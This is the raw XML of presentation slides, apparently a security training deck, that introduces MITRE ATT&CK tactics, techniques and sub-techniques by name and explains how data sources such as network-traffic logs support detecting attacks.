                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>  Mimic hackers vs. follow recipes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🏁 Marathon vs. Sprint</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>  Ongoing tests vs. time-bound fixes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🛡️ Build Reflexes vs. Patch Holes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>  Strategic insights vs. actionable to-dos.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C662B1A-9BE6-CB54-8FEF-56DC7E311E0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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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2189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B7A883-7FCC-3C82-B3EB-9040ACBDB5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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07CC64B8-5D70-A7B2-5D5E-F6F26C4255C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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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8FCB951E-FD26-FD2C-EB0E-73945F241A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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1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Subtechniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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34E64D0-D871-6F08-75DC-712A53561563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742751" y="1363134"/>
            <a:ext cx="6834915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IN" sz="16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Inter"/>
              </a:rPr>
              <a:t>Tactic 		        Technique	                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Subtechnique</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Inter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A9DE37F-77DD-BA43-86FE-EE740CCA5841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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9950155" y="6053252"/>
            <a:ext cx="1761829" cy="728134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7F47FB74-3D6F-4E37-B0AB-C96AC614C1DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="1851784"/>
            <a:ext cx="244686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  <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Resource Development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Initial Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Defense Evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Credential Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Lateral Movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Command and Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Exfiltration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter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8A86CC8-E6C7-13D1-E268-965A603887BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895597" y="1851784"/>
            <a:ext cx="2971803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  <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Active Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Develop Capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Scheduled Task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Create Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Process Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Masquerading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Brute Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Account Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Remote Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Email Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Encrypted Channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Exfiltration Over Alternative </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Network Denial of Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter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FB67E1F-7061-02C3-7532-18401A5049D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5563923" y="1851784"/>
            <a:ext cx="3478477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  <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter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Inter"/>
              </a:rPr>
              <a:t>Spearphishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Attachment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Cron</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Local Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Dynamic-link Library Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Double File Extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Password Spraying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Cloud Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Remote Desktop Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Remote Email Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Asymmetric Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Exfiltration Over Asymmetric    Encrypted  Non-C2 Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> Direct Network Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A person in a hoodie sitting at a desk with multiple computer screens&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A89A6E2-023E-25DF-A5DF-A64E810CCE0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209540" y="2006600"/>
            <a:ext cx="3786555" cy="259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9401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ABB61F-4AED-3BC0-3606-84F10E4EF2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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F568059-ABCD-D08A-FB8F-24C7CDA4E65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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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CEFDE5F6-D93D-7170-B402-2678B48678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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Data Source</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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8F42B52-BD76-321F-50E5-C95CB6936919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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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78D7DF3-256F-C0FF-3155-AA24E1AD5351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="36994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l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Inter"/>
              </a:rPr>
              <a:t>What Are Data Sources?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They provide the raw information (telemetry) needed to detect and understand attacks.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They help you know where to look for signs of adversary actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Purpose in MITRE ATT&amp;CK:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Connects tactics, techniques, and sub-techniques to actual data you can collect.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Guides you on what to monitor in your security systems (like SIEM).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1725248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EC8D65F-EE83-9E5E-988C-26235CB2A1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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28CD3E43-68A8-6BCA-634E-9E825111D00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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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D786B411-F744-E5C2-1043-E08554487B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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Data Source – Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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5613F4D4-106A-F28B-8F93-2ADF817BED3E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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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753F099-FE75-3DEE-D4AF-8B704EB84EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838197" y="1363134"/>
            <a:ext cx="11353801" cy="49305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l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Inter"/>
              </a:rPr>
              <a:t>For Reconnaissance:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Tactic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Active Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Sub Technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Data Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Network traffic (e.g., logs from your web application firewall or on-premises network)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Data sources point you in the right direction to spot and combat the attacks, helping you filter the noise and focus on real threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2294410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32BB712-40B0-C5A7-723A-5CED8E09F7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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA840D0-F674-E1AA-1BB7-4AF7E3F51B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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
